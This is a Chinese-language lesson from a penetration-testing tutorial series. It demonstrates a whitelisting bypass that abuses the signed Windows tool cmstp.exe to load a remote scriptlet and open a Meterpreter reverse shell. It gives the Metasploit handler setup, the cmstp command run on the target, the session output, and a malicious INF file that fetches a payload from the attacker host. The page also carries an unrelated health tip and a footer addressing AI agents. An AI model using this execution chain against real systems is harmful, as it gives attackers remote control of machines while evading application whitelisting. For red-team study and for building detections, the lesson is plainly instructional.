# 第八十七课:基于白名单Cmstp.exe执行payload第十六季 **注:**请多喝点热水或者凉白开,可预防**肾结石,通风**等。 痛风可伴发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。 ## Cmstp简介: Cmstp安装或删除“连接管理器”服务配置文件。如果不含可选参数的情况下使用,则 cmstp 会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。 微软官方文档:\ **说明:**Cmstp.exe所在路径已被系统添加PATH环境变量中,因此,Cmstp命令可识别,需注意x86,x64位的Cmstp调用。 Windows 2003 默认位置: ```bash C:\Windows\System32\cmstp.exe C:\Windows\SysWOW64\cmstp.exe ``` Windows 7 默认位置: ```bash C:\Windows\System32\cmstp.exe C:\Windows\SysWOW64\cmstp.exe ``` **攻击机:** 192.168.1.4 Debian\ **靶机:** 192.168.1.119 Windows 7 ## 配置攻击机msf: **注:x64 payload** ```bash msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐ Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐ EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.4 yes The listen address (an interface may be specified) LPORT 53 yes The listen port Exploit target: Id Name ‐‐ ‐‐‐‐ 0 Wildcard Target emsf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.4:53 ``` > ![](/files/-LZJwpwxI57Lc0QqWeeY) ## 靶机执行: ```bash cmstp.exe /ni /s C:\Users\John\Desktop\rev.inf ``` ![](/files/-LZJwpx-mSM8FlTx196V) ## 注:x64 payload ```bash msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.4:53 [*] Sending stage (206403 bytes) to 192.168.1.5 [*] Meterpreter session 9 opened (192.168.1.4:53 ‐> 192.168.1.5:13220) at 2019‐01‐20 12:08:52 ‐0500 meterpreter > getuid Server username: John‐PC\John meterpreter > getpid Current pid: 8632 meterpreter > ``` ![](/files/-LZJwpx11W9PHw9ta1qk) ## 附录: **Micropoor\_rev\_cmstp\_inf:** ``` [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall_SingleUser] UnRegisterOCXs=UnRegisterOCXSection [UnRegisterOCXSection] %11%\scrobj.dll,NI,http://192.168.1.4/cmstp_rev_53_x64.sct [Strings] AppAct = "SOFTWARE\Microsoft\Connection Manager" ServiceName="Micropoor" ShortSvcName="Micropoor" ``` **cmstp\_rev\_53\_x64.sct** ```javascript ``` > Micropoor --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://micro8.gitbook.io/micro8/contents-1/81-90/87-ji-yu-bai-ming-dan-cmstp.exe-zhi-hang-payload-di-shi-liu-ji.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.